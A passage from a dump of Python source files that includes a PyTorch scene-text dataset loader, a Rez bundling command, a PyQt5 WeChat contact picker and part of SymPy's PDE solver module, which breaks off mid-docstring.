text_bboxes = np.asarray(self.text_bboxes[image_name])\n if self.args.ocr == 'google_ocr':\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n if np.shape(text_bboxes)[0] == 0:\n text_bboxes = np.zeros((1, 4))\n elif np.shape(text_bboxes)[0] > self.args.max_textual:\n text_bboxes = text_bboxes[0:self.args.max_textual]\n text_bboxes_features[:len(text_bboxes)] = text_bboxes\n else:\n # NO BBOXES FOR OTHER OCRs\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n text_bboxes_features = torch.from_numpy(text_bboxes_features)\n text_bboxes_features = text_bboxes_features.type(torch.FloatTensor)\n\n # LOCAL VISUAL FEATURES\n local_features_index = self.image_name2features_index[image_name]\n local_features = self.local_feats[int(local_features_index)]\n local_features = torch.from_numpy(local_features[:int(self.args.max_visual)][:])\n local_features = local_features.type(torch.FloatTensor)\n # LOCAL VISUAL BBOXES\n local_bboxes_features = self.local_bboxes[int(local_features_index)]\n local_bboxes_features = torch.from_numpy(local_bboxes_features[:int(self.args.max_visual)][:])\n local_bboxes_features = local_bboxes_features.type(torch.FloatTensor)\n\n return img, label, text_features, local_features, text_bboxes_features, local_bboxes_features, image_name\n\n\nclass Context_Test(data.Dataset):\n def __init__(self, args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, transform=None):\n self.args = args\n self.gt_annotations = gt_annotations\n self.text_embedding = text_embedding\n self.embedding_size = embedding_size\n self.transform = transform\n self.image_list = list(gt_annotations['test'].keys())\n\n self.image_name2features_index = image_name2features_index\n self.local_feats = local_feats\n self.text_bboxes = text_bboxes\n self.local_bboxes = local_bboxes\n\n def __len__(self):\n return len(self.gt_annotations['test'])\n\n def __getitem__(self, index):\n data_path = self.args.data_path\n assert index <= len(self), 'index range error'\n image_name = self.image_list[index].rstrip()\n image_path = data_path+ '/Context/data/JPEGImages/' + image_name\n img = Image.open(image_path).convert('RGB')\n if self.transform:\n img = self.transform(img)\n\n img_class = self.gt_annotations['test'][image_name]\n label = np.zeros(28)\n label[int(img_class) - 1] = 1\n label = torch.from_numpy(label)\n label = label.type(torch.FloatTensor)\n\n if self.args.embedding == 'w2vec' or self.args.embedding == 'fasttext' or self.args.embedding == 'glove' or self.args.embedding == 'bert':\n text_embedding = np.asarray(self.text_embedding[image_name])\n elif self.args.embedding == 'phoc':\n with open (data_path + '/Context/yolo_phoc/'+image_name[:-3]+'json') as fp:\n phocs = json.load(fp)\n text_embedding = np.resize(phocs, (np.shape(phocs)[0], 604))\n\n elif self.args.embedding == 'fisher':\n if self.args.ocr == 'yolo_phoc':\n relative_path = '/Context/old_fisher_vectors/'\n elif self.args.ocr == 'e2e_mlt':\n relative_path = '/Context/fasttext_fisher/'\n else: print('Not Implemented')\n with open (data_path + relative_path +image_name[:-3]+'json')as fp:\n fisher_vector = json.load(fp)\n text_embedding = np.resize(fisher_vector, (1, 38400))\n # FISHER VECTORS DO NOT NEED MAX TEXTUAL\n if self.args.embedding != 'fisher':\n text_features = np.zeros((self.args.max_textual, self.embedding_size))\n if np.shape(text_embedding)[0] == 0:\n text_embedding = np.zeros((1,self.embedding_size))\n elif np.shape(text_embedding)[0] > self.args.max_textual:\n text_embedding = text_embedding[0:self.args.max_textual]\n text_features[:len(text_embedding)] = text_embedding\n else:\n text_features = text_embedding\n\n text_features = torch.from_numpy(text_features)\n text_features = text_features.type(torch.FloatTensor)\n # SCENE TEXT BBOXES ONLY FOR GOOGLE OCR\n text_bboxes = np.asarray(self.text_bboxes[image_name])\n if self.args.ocr == 'google_ocr':\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n if np.shape(text_bboxes)[0] == 0:\n text_bboxes = np.zeros((1, 4))\n elif np.shape(text_bboxes)[0] > self.args.max_textual:\n text_bboxes = text_bboxes[0:self.args.max_textual]\n text_bboxes_features[:len(text_bboxes)] = text_bboxes\n else:\n # NO BBOXES FOR OTHER OCRs\n text_bboxes_features = np.zeros((self.args.max_textual, 4))\n text_bboxes_features = torch.from_numpy(text_bboxes_features)\n text_bboxes_features = text_bboxes_features.type(torch.FloatTensor)\n\n # LOCAL VISUAL FEATURES\n local_features_index = self.image_name2features_index[image_name]\n local_features = self.local_feats[int(local_features_index)]\n local_features = torch.from_numpy(local_features[:int(self.args.max_visual)][:])\n local_features = local_features.type(torch.FloatTensor)\n # LOCAL VISUAL BBOXES\n local_bboxes_features = self.local_bboxes[int(local_features_index)]\n local_bboxes_features = torch.from_numpy(local_bboxes_features[:int(self.args.max_visual)][:])\n local_bboxes_features = local_bboxes_features.type(torch.FloatTensor)\n\n return img, label, text_features, local_features, text_bboxes_features, local_bboxes_features, image_name\n\n\n\n\n\n"} {"ext": "py", "sha": "1a31067bd02cd02548837e213163e0acd785d8c6", "content": "from .voxel_set_abstraction import VoxelSetAbstraction\nfrom .def_voxel_set_abstraction import DefVoxelSetAbstraction\n\n__all__ = {\n 'VoxelSetAbstraction': VoxelSetAbstraction, \n 'DefVoxelSetAbstraction': DefVoxelSetAbstraction\n}\n\n\n"} {"ext": "py", "sha": "1a310776abf7875f377eb507b9ab3fb7f21f81c5", "content": "# Copyright Contributors to the Rez project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n'''\nBundle a context and its packages into a relocatable dir.\n'''\nfrom __future__ import print_function\n\nimport os\nimport os.path\nimport sys\n\n\ndef setup_parser(parser, completions=False):\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"-s\", \"--skip-non-relocatable\", action=\"store_true\",\n help=\"leave non-relocatable packages non-bundled, rather than raise an error\")\n group.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"bundle package even if it isn't relocatable (use at your own risk)\")\n group.add_argument(\n \"-n\", \"--no-lib-patch\", action=\"store_true\",\n help=\"don't apply library patching within the bundle\")\n parser.add_argument(\n \"RXT\",\n help=\"context to bundle\")\n parser.add_argument(\n \"DEST_DIR\",\n help=\"directory to create bundle in; must not exist\")\n\n\ndef command(opts, parser, extra_arg_groups=None):\n from rez.utils.logging_ import print_error\n from rez.bundle_context import bundle_context\n from rez.resolved_context import ResolvedContext\n\n rxt_filepath = os.path.abspath(os.path.expanduser(opts.RXT))\n dest_dir = os.path.abspath(os.path.expanduser(opts.DEST_DIR))\n\n # sanity checks\n if not os.path.exists(rxt_filepath):\n print_error(\"File does not exist: %s\", rxt_filepath)\n sys.exit(1)\n\n context = ResolvedContext.load(rxt_filepath)\n\n bundle_context(\n context=context,\n dest_dir=dest_dir,\n force=opts.force,\n skip_non_relocatable=opts.skip_non_relocatable,\n verbose=opts.verbose,\n patch_libs=(not opts.no_lib_patch)\n )\n"} {"ext": "py", "sha": "1a310ab0a721ed99d6df375ddfdf50875f5fd8f6", "content": "class CogTV:\n def __init__(self):\n pass\n \n def setScreen(self, scene):\n pass\n \n"} {"ext": "py", "sha": "1a310b0d553f5abe9491d815ab4b0c628638105a", "content": "#!/usr/bin/python2.7\r\n# -*- coding: UTF-8 -*-\r\n'''\r\nCreated on 2018年6月15日\r\n\r\n@author: zhaohongxing\r\n'''\r\nimport os\r\n\r\nfrom PyQt5.Qt import Qt\r\nfrom PyQt5.Qt import QIcon,QStandardItemModel,QStandardItem\r\n'''\r\nfrom PyQt5 import QtGui\r\n'''\r\nfrom PyQt5.QtWidgets import QTableView,QVBoxLayout,QDialog,QPushButton\r\nfrom PyQt5.QtCore import QSize, pyqtSignal\r\nimport wechatutil\r\n\r\nclass ContactListWindow(QDialog):\r\n WIDTH = 600\r\n membersConfirmed = pyqtSignal(str)\r\n \r\n def __init__(self,member_list,parent = None):\r\n super(ContactListWindow,self).__init__(parent)\r\n self.setModal(True)\r\n self.user_home = os.path.expanduser('~')\r\n self.app_home = self.user_home + '/.wechat/'\r\n self.head_home = (\"%s/heads\"%(self.app_home))\r\n self.cache_home = (\"%s/cache/\"%(self.app_home))\r\n self.cache_image_home = \"%s/image/\"%(self.cache_home)\r\n self.contact_head_home = (\"%s/contact/\"%(self.head_home))\r\n self.default_head_icon = './resource/images/default.png'\r\n self.members = member_list\r\n self.membersTable = QTableView()\r\n self.membersTable.horizontalHeader().setStretchLastSection(True)\r\n self.membersTable.verticalHeader().setDefaultSectionSize(60)\r\n #self.membersTable.horizontalHeader().setDefaultSectionSize(60)\r\n self.membersTable.setColumnWidth(0, 10);\r\n self.membersTable.setColumnWidth(1, 60);\r\n self.membersTable.verticalHeader().setVisible(False)\r\n self.membersTable.horizontalHeader().setVisible(False)\r\n #confirm\r\n self.confirm = QPushButton(wechatutil.unicode(\"確定\"),self)\r\n self.membersTableModel = QStandardItemModel(0,2)\r\n self.membersTableModel.itemChanged.connect(self.itemChanged)\r\n self.initinal_member_list_widget()\r\n mainLayout=QVBoxLayout()\r\n mainLayout.addWidget(self.membersTable)\r\n mainLayout.addWidget(self.confirm)\r\n self.setLayout(mainLayout)\r\n #self.membersTable.clicked.connect(self.contact_item_clicked)\r\n self.confirm.clicked.connect(self.do_confirm)\r\n self.selectedRowCount = 0\r\n \r\n def itemChanged(self,item):\r\n if item.checkState() == Qt.Checked:\r\n self.selectedRowCount += 1\r\n else:\r\n self.selectedRowCount -= 1\r\n \r\n if self.selectedRowCount > 0:\r\n self.confirm.setText(wechatutil.unicode(\"確定(%d)\"%(self.selectedRowCount)))\r\n else:\r\n self.confirm.setText(wechatutil.unicode(\"確定\"))\r\n \r\n def initinal_member_list_widget(self):\r\n self.append_row(self.members, self.membersTableModel)\r\n self.membersTable.setModel(self.membersTableModel)\r\n self.membersTable.setIconSize(QSize(40,40))\r\n \r\n def append_row(self,members,data_model):\r\n for (i,member) in enumerate(members):\r\n cells = []\r\n user_name = member['UserName']\r\n user_name_cell = QStandardItem(user_name)\r\n user_name_cell.setCheckable(True)\r\n cells.append(user_name_cell)\r\n \r\n user_avatar = self.contact_head_home + member['UserName']+\".jpg\"\r\n if not os.path.exists(user_avatar):\r\n user_avatar = self.default_head_icon\r\n dn = member['DisplayName'] or member['NickName']\r\n if not dn:\r\n dn = member['NickName']\r\n item = QStandardItem(QIcon(user_avatar),wechatutil.unicode(dn))\r\n cells.append(item)\r\n data_model.appendRow(cells)\r\n \r\n def do_confirm(self):\r\n rowCount = self.membersTableModel.rowCount() \r\n selected_user_names = \"\"\r\n for row in range(rowCount):\r\n item = self.membersTableModel.item(row,0)\r\n if item.checkState() == Qt.Checked:\r\n index = self.membersTableModel.index(row,0)\r\n user_name_obj = self.membersTableModel.data(index)\r\n if user_name_obj:\r\n user_name = user_name_obj\r\n user = {}\r\n user['UserName']=user_name\r\n selected_user_names=selected_user_names+(user_name)\r\n selected_user_names=selected_user_names+(\";\")\r\n \r\n if len(selected_user_names) > 0:\r\n dictt = {}\r\n dictt['UserNames']=selected_user_names\r\n self.membersConfirmed.emit(selected_user_names)\r\n \r\n self.close()"} {"ext": "py", "sha": "1a310b66a9b824753a91af32fceeba35240da5ec", "content": "\"\"\"\nThis module contains pdsolve() and different helper functions that it\nuses. It is heavily inspired by the ode module and hence the basic\ninfrastructure remains the same.\n\n**Functions in this module**\n\n These are the user functions in this module:\n\n - pdsolve() - Solves PDE's\n - classify_pde() - Classifies PDEs into possible hints for dsolve().\n - pde_separate() - Separate variables in partial differential equation either by\n additive or multiplicative separation approach.\n\n These are the helper functions in this module:\n\n - pde_separate_add() - Helper function for searching additive separable solutions.\n - pde_separate_mul() - Helper function for searching multiplicative\n separable solutions.\n\n**Currently implemented solver methods**\n\nThe following methods are implemented for solving partial differential\nequations. See the docstrings of the various pde_hint() functions for\nmore information on each (run help(pde)):\n\n - 1st order linear homogeneous partial differential equations\n with constant coefficients.\n - 1st order linear general partial differential equations\n with constant coefficients.\n - 1st order linear partial differential equations with\n variable coefficients.\n\n\"\"\"\nfrom functools import reduce\n\nfrom itertools import combinations_with_replacement\nfrom sympy.simplify import simplify # type: ignore\nfrom sympy.core import Add, S\nfrom sympy.core.function import Function, expand, AppliedUndef, Subs\nfrom sympy.core.relational import Equality, Eq\nfrom sympy.core.symbol import Symbol, Wild, symbols\nfrom sympy.functions import exp\nfrom sympy.integrals.integrals import Integral, integrate\nfrom sympy.utilities.iterables import has_dups, is_sequence\nfrom sympy.utilities.misc import filldedent\n\nfrom sympy.solvers.deutils import _preprocess, ode_order, _desolve\nfrom sympy.solvers.solvers import solve\nfrom sympy.simplify.radsimp import collect\n\nimport operator\n\n\nallhints = (\n \"1st_linear_constant_coeff_homogeneous\",\n \"1st_linear_constant_coeff\",\n \"1st_linear_constant_coeff_Integral\",\n \"1st_linear_variable_coeff\"\n )\n\n\ndef pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):\n \"\"\"\n Solves any (supported) kind of partial differential equation.\n\n **Usage**\n\n pdsolve(eq, f(x,y), hint) -> Solve partial differential equation\n eq for function f(x,y), using method hint.\n\n **Details**\n\n ``eq`` can be any supported partial differential equation (see\n the pde docstring for supported methods). This can either\n be an Equality, or an expression, which is assumed to be\n equal to 0.\n\n ``f(x,y)`` is a function of two variables whose derivatives in that\n variable make up the partial differential equation. In many\n cases it is not necessary to provide this; it will be autodetected\n (and an error raised if it couldn't be detected).\n\n ``hint`` is the solving method that you want pdsolve to use. Use\n classify_pde(eq, f(x,y)) to get all of the possible hints for\n a PDE. The default hint, 'default', will use whatever hint\n is returned first by classify_pde(). See Hints below for\n more options that you can use for hint.\n\n ``solvefun`` is the convention used for arbitrary functions returned\n by the PDE solver. If not set by the user, it is set by default\n to be F.\n\n **Hints**\n\n Aside from the various solving methods, there are also some\n meta-hints that you can pass to pdsolve():\n\n \"default\":\n This uses whatever hint is returned first by\n classify_pde(). This is the default argument to\n pdsolve().\n\n \"all\":\n To make pdsolve apply all relevant classification hints,\n use pdsolve(PDE, func, hint=\"all\"). This will return a\n dictionary of hint:solution terms. If a hint causes\n pdsolve to raise the NotImplementedError, value of that\n hint's key will be the exception object raised. The\n dictionary will also include some special keys:\n\n - order: The order of the PDE. See also ode_order() in\n deutils.py\n - default: The solution that would be returned by\n default. This is the one produced by the hint that\n appears first in the tuple returned by classify_pde().\n\n \"all_Integral\":\n This is the same as \"all\", except if a hint also has a\n corresponding \"_Integral\" hint, it only returns the\n \"_Integral\" hint. This is useful if \"all\" causes\n pdsolve() to hang because of a difficult or impossible\n integral. This meta-hint will also be much faster than\n \"all\", because integrate() is an expensive routine.\n\n See also the classify_pde() docstring for more info on hints,\n and the pde docstring for a list of all supported hints.\n\n **Tips**\n - You can declare the derivative of an unknown function this way:\n\n >>> from sympy import Function, Derivative\n >>> from sympy.abc import x, y # x and y are the independent variables\n >>> f = Function(\"f\")(x, y) # f is a function of x and y\n >>> # fx will be the partial derivative of f with respect to x\n >>> fx = Derivative(f, x)\n >>> # fy will be the partial derivative of f with respect to y\n >>> fy = Derivative(f, y)\n\n - See test_pde.py for many tests, which serves also as a set of\n examples for how to use pdsolve().\n - pdsolve always returns an Equality class (except for the case\n when the hint is \"all\" or \"all_Integral\"). Note that it is not possible\n to get an explicit solution for f(x, y) as in the case of ODE's\n - Do help(pde.pde_hintname) to get help more information on a\n specific hint\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, Eq\n >>> from sympy.abc import x, y\n >>> f = Function('f')\n >>> u = f(x, y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)\n >>> pdsolve(eq)\n Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))\n\n \"\"\"\n\n if not solvefun:\n solvefun = Function('F')\n\n # See the docstring of _desolve for more details.\n hints = _desolve(eq, func=func, hint=hint, simplify=True,\n type='pde', **kwargs)\n eq = hints.pop('eq', False)\n all_ = hints.pop('all', False)\n\n if all_:\n # TODO : 'best' hint should be implemented when adequate\n # number of hints are added.\n pdedict = {}\n failed_hints = {}\n gethints = classify_pde(eq, dict=True)\n pdedict.update({'order': gethints['order'],\n 'default': gethints['default']})\n for hint in hints:\n try:\n rv = _helper_simplify(eq, hint, hints[hint]['func'],\n hints[hint]['order'], hints[hint][hint], solvefun)\n except NotImplementedError as detail:\n failed_hints[hint] = detail\n else:\n pdedict[hint] = rv\n pdedict.update(failed_hints)\n return pdedict\n\n else:\n return _helper_simplify(eq, hints['hint'], hints['func'],\n hints['order'], hints[hints['hint']], solvefun)\n\n\ndef _helper_simplify(eq, hint, func, order, match, solvefun):\n \"\"\"Helper function of pdsolve that calls the respective\n pde functions to solve for the partial differential\n equations. This minimizes the computation in\n calling _desolve multiple times.\n \"\"\"\n\n if hint.endswith(\"_Integral\"):\n solvefunc = globals()[\n \"pde_\" + hint[:-len(\"_Integral\")]]\n else:\n solvefunc = globals()[\"pde_\" + hint]\n return _handle_Integral(solvefunc(eq, func, order,\n match, solvefun), func, order, hint)\n\n\ndef _handle_Integral(expr, func, order, hint):\n r\"\"\"\n Converts a solution with integrals in it into an actual solution.\n\n Simplifies the integral mainly using doit()\n \"\"\"\n if hint.endswith(\"_Integral\"):\n return expr\n\n elif hint == \"1st_linear_constant_coeff\":\n return simplify(expr.doit())\n\n else:\n return expr\n\n\ndef classify_pde(eq, func=None, dict=False, *, prep=True, **kwargs):\n \"\"\"\n Returns a tuple of possible pdsolve() classifications for a PDE.\n\n The tuple is ordered so that first item is the classification that\n pdsolve() uses to solve the PDE by default. In general,\n classifications near the beginning of the list will produce\n better solutions faster than those near the end, though there are\n always exceptions. To make pdsolve use a different classification,\n use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()\n docstring for different meta-hints you can use.\n\n If ``dict`` is true, classify_pde() will return a dictionary of\n hint:match expression terms. This is intended for internal use by\n pdsolve(). Note that because dictionaries are ordered arbitrarily,\n this will most likely not be in the same order as the tuple.\n\n You can get help on different hints by doing help(pde.pde_hintname),\n where hintname is the name of the hint without \"_Integral\".\n\n See sympy.pde.allhints or the sympy.pde docstring for a list of all\n supported hints that can be returned from classify_pde.\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import classify_pde\n >>> from sympy import Function, Eq\n >>> from sympy.abc import x, y\n >>> f = Function('f')\n >>> u = f(x, y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)\n >>> classify_pde(eq)\n ('1st_linear_constant_coeff_homogeneous',)\n \"\"\"\n\n if func and len(func.args) != 2:\n raise NotImplementedError(\"Right now only partial \"\n \"differential equations of two variables are supported\")\n\n if prep or func is None:\n prep, func_ = _preprocess(eq, func)\n if func is None:\n func = func_\n\n if isinstance(eq, Equality):\n if eq.rhs != 0:\n return classify_pde(eq.lhs - eq.rhs, func)\n eq = eq.lhs\n\n f = func.func\n x = func.args[0]\n y = func.args[1]\n fx = f(x,y).diff(x)\n fy = f(x,y).diff(y)\n\n # TODO : For now pde.py uses support offered by the ode_order function\n # to find the order with respect to a multi-variable function. An\n # improvement could be to classify the order of the PDE on the basis of\n # individual variables.\n order = ode_order(eq, f(x,y))\n\n # hint:matchdict or hint:(tuple of matchdicts)\n # Also will contain \"default\":<default hint> and \"order\":order items.\n matching_hints = {'order': order}\n\n if not order:\n if dict:\n matching_hints[\"default\"] = None\n return matching_hints\n else:\n return ()\n\n eq = expand(eq)\n\n a = Wild('a', exclude = [f(x,y)])\n b = Wild('b', exclude = [f(x,y), fx, fy, x, y])\n c = Wild('c', exclude = [f(x,y), fx, fy, x, y])\n d = Wild('d', exclude = [f(x,y), fx, fy, x, y])\n e = Wild('e', exclude = [f(x,y), fx, fy])\n n = Wild('n', exclude = [x, y])\n # Try removing the smallest power of f(x,y)\n # from the highest partial derivatives of f(x,y)\n reduced_eq = None\n if eq.is_Add:\n var = set(combinations_with_replacement((x,y), order))\n dummyvar = var.copy()\n power = None\n for i in var:\n coeff = eq.coeff(f(x,y).diff(*i))\n if coeff != 1:\n match = coeff.match(a*f(x,y)**n)\n if match and match[a]:\n power = match[n]\n dummyvar.remove(i)\n break\n dummyvar.remove(i)\n for i in dummyvar:\n coeff = eq.coeff(f(x,y).diff(*i))\n if coeff != 1:\n match = coeff.match(a*f(x,y)**n)\n if match and match[a] and match[n] < power:\n power = match[n]\n if power:\n den = f(x,y)**power\n reduced_eq = Add(*[arg/den for arg in eq.args])\n if not reduced_eq:\n reduced_eq = eq\n\n if order == 1:\n reduced_eq = collect(reduced_eq, f(x, y))\n r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)\n if r:\n if not r[e]:\n ## Linear first-order homogeneous partial-differential\n ## equation with constant coefficients\n r.update({'b': b, 'c': c, 'd': d})\n matching_hints[\"1st_linear_constant_coeff_homogeneous\"] = r\n else:\n if r[b]**2 + r[c]**2 != 0:\n ## Linear first-order general partial-differential\n ## equation with constant coefficients\n r.update({'b': b, 'c': c, 'd': d, 'e': e})\n matching_hints[\"1st_linear_constant_coeff\"] = r\n matching_hints[\n \"1st_linear_constant_coeff_Integral\"] = r\n\n else:\n b = Wild('b', exclude=[f(x, y), fx, fy])\n c = Wild('c', exclude=[f(x, y), fx, fy])\n d = Wild('d', exclude=[f(x, y), fx, fy])\n r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)\n if r:\n r.update({'b': b, 'c': c, 'd': d, 'e': e})\n matching_hints[\"1st_linear_variable_coeff\"] = r\n\n # Order keys based on allhints.\n retlist = []\n for i in allhints:\n if i in matching_hints:\n retlist.append(i)\n\n if dict:\n # Dictionaries are ordered arbitrarily, so make note of which\n # hint would come first for pdsolve(). Use an ordered dict in Py 3.\n matching_hints[\"default\"] = None\n matching_hints[\"ordered_hints\"] = tuple(retlist)\n for i in allhints:\n if i in matching_hints:\n matching_hints[\"default\"] = i\n break\n return matching_hints\n else:\n return tuple(retlist)\n\n\ndef checkpdesol(pde, sol, func=None, solve_for_func=True):\n \"\"\"\n Checks if the given solution satisfies the partial differential\n equation.\n\n pde is the partial differential equation which can be given in the\n form of an equation or an expression. sol is the solution for which\n the pde is to be checked. This can also be given in an equation or\n an expression form. If the function is not provided, the helper\n function _preprocess from deutils is used to identify the function.\n\n If a sequence of solutions is passed, the same sort of container will be\n used to return the result for each solution.\n\n The following methods are currently being implemented to check if the\n solution satisfies the PDE:\n\n 1. Directly substitute the solution in the PDE and check. If the\n solution hasn't been solved for f, then it will solve for f\n provided solve_for_func hasn't been set to False.\n\n If the solution satisfies the PDE, then a tuple (True, 0) is returned.\n Otherwise a tuple (False, expr) where expr is the value obtained\n after substituting the solution in the PDE. However if a known solution\n returns False, it may be due to the inability of doit() to simplify it to zero.\n\n Examples\n ========\n\n >>> from sympy import Function, symbols\n >>> from sympy.solvers.pde import checkpdesol, pdsolve\n >>> x, y = symbols('x y')\n >>> f = Function('f')\n >>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)\n >>> sol = pdsolve(eq)\n >>> assert checkpdesol(eq, sol)[0]\n >>> eq = x*f(x,y) + f(x,y).diff(x)\n >>> checkpdesol(eq, sol)\n (False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), _xi_1, 4*x - 3*y))*exp(-6*x/25 - 8*y/25))\n \"\"\"\n\n # Converting the pde into an equation\n if not isinstance(pde, Equality):\n pde = Eq(pde, 0)\n\n # If no function is given, try finding the function present.\n if func is None:\n try:\n _, func = _preprocess(pde.lhs)\n except ValueError:\n funcs = [s.atoms(AppliedUndef) for s in (\n sol if is_sequence(sol, set) else [sol])]\n funcs = set().union(funcs)\n if len(funcs) != 1:\n raise ValueError(\n 'must pass func arg to checkpdesol for this case.')\n func = funcs.pop()\n\n # If the given solution is in the form of a list or a set\n # then return a list or set of tuples.\n if is_sequence(sol, set):\n return type(sol)([checkpdesol(\n pde, i, func=func,\n solve_for_func=solve_for_func) for i in sol])\n\n # Convert solution into an equation\n if not isinstance(sol, Equality):\n sol = Eq(func, sol)\n elif sol.rhs == func:\n sol = sol.reversed\n\n # Try solving for the function\n solved = sol.lhs == func and not sol.rhs.has(func)\n if solve_for_func and not solved:\n solved = solve(sol, func)\n if solved:\n if len(solved) == 1:\n return checkpdesol(pde, Eq(func, solved[0]),\n func=func, solve_for_func=False)\n else:\n return checkpdesol(pde, [Eq(func, t) for t in solved],\n func=func, solve_for_func=False)\n\n # try direct substitution of the solution into the PDE and simplify\n if sol.lhs == func:\n pde = pde.lhs - pde.rhs\n s = simplify(pde.subs(func, sol.rhs).doit())\n return s is S.Zero, s\n\n raise NotImplementedError(filldedent('''\n Unable to test if %s is a solution to %s.''' % (sol, pde)))\n\n\n\ndef pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear homogeneous\n partial differential equation with constant coefficients.\n\n The general form of this partial differential equation is\n\n .. math:: a \\frac{\\partial f(x,y)}{\\partial x}\n + b \\frac{\\partial f(x,y)}{\\partial y} + c f(x,y) = 0\n\n where `a`, `b` and `c` are constants.\n\n The general solution is of the form:\n\n .. math::\n f(x, y) = F(- a y + b x ) e^{- \\frac{c (a x + b y)}{a^2 + b^2}}\n\n and can be found in SymPy with ``pdsolve``::\n\n >>> from sympy.solvers import pdsolve\n >>> from sympy.abc import x, y, a, b, c\n >>> from sympy import Function, pprint\n >>> f = Function('f')\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a*ux + b*uy + c*u\n >>> pprint(genform)\n d d\n a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y)\n dx dy\n\n >>> pprint(pdsolve(genform))\n -c*(a*x + b*y)\n ---------------\n 2 2\n a + b\n f(x, y) = F(-a*y + b*x)*e\n\n Examples\n ========\n\n >>> from sympy import pdsolve\n >>> from sympy import Function, pprint\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))\n Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))\n >>> pprint(pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)))\n x y\n - - - -\n 2 2\n f(x, y) = F(x - y)*e\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n # TODO : For now homogeneous first order linear PDE's having\n # two variables are implemented. Once there is support for\n # solving systems of ODE's, this can be extended to n variables.\n\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n return Eq(f(x,y), exp(-S(d)/(b**2 + c**2)*(b*x + c*y))*solvefun(c*x - b*y))\n\n\ndef pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear partial differential equation\n with constant coefficients.\n\n The general form of this partial differential equation is\n\n .. math:: a \\frac{\\partial f(x,y)}{\\partial x}\n + b \\frac{\\partial f(x,y)}{\\partial y}\n + c f(x,y) = G(x,y)\n\n where `a`, `b` and `c` are constants and `G(x, y)` can be an arbitrary\n function in `x` and `y`.\n\n The general solution of the PDE is:\n\n .. math::\n f(x, y) = \\left. \\left[F(\\eta) + \\frac{1}{a^2 + b^2}\n \\int\\limits^{a x + b y} G\\left(\\frac{a \\xi + b \\eta}{a^2 + b^2},\n \\frac{- a \\eta + b \\xi}{a^2 + b^2} \\right)\n e^{\\frac{c \\xi}{a^2 + b^2}}\\, d\\xi\\right]\n e^{- \\frac{c \\xi}{a^2 + b^2}}\n \\right|_{\\substack{\\eta=- a y + b x\\\\ \\xi=a x + b y }}\\, ,\n\n where `F(\\eta)` is an arbitrary single-valued function. The solution\n can be found in SymPy with ``pdsolve``::\n\n >>> from sympy.solvers import pdsolve\n >>> from sympy.abc import x, y, a, b, c\n >>> from sympy import Function, pprint\n >>> f = Function('f')\n >>> G = Function('G')\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a*ux + b*uy + c*u - G(x,y)\n >>> pprint(genform)\n d d\n a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y) - G(x, y)\n dx dy\n >>> pprint(pdsolve(genform, hint='1st_linear_constant_coeff_Integral'))\n // a*x + b*y \\\n || / |\n || | |\n || | c*xi |\n || | ------- |\n || | 2 2 |\n || | /a*xi + b*eta -a*eta + b*xi\\ a + b |\n || | G|------------, -------------|*e d(xi)|\n || | | 2 2 2 2 | |\n || | \\ a + b a + b / |\n || | |\n || / |\n || |\n f(x, y) = ||F(eta) + -------------------------------------------------------|*\n || 2 2 |\n \\\\ a + b /\n <BLANKLINE>\n \\|\n ||\n ||\n ||\n ||\n ||\n ||\n ||\n ||\n -c*xi ||\n -------||\n 2 2||\n a + b ||\n e ||\n ||\n /|eta=-a*y + b*x, xi=a*x + b*y\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, pprint, exp\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)\n >>> pdsolve(eq)\n Eq(f(x, y), (F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n\n # TODO : For now homogeneous first order linear PDE's having\n # two variables are implemented. Once there is support 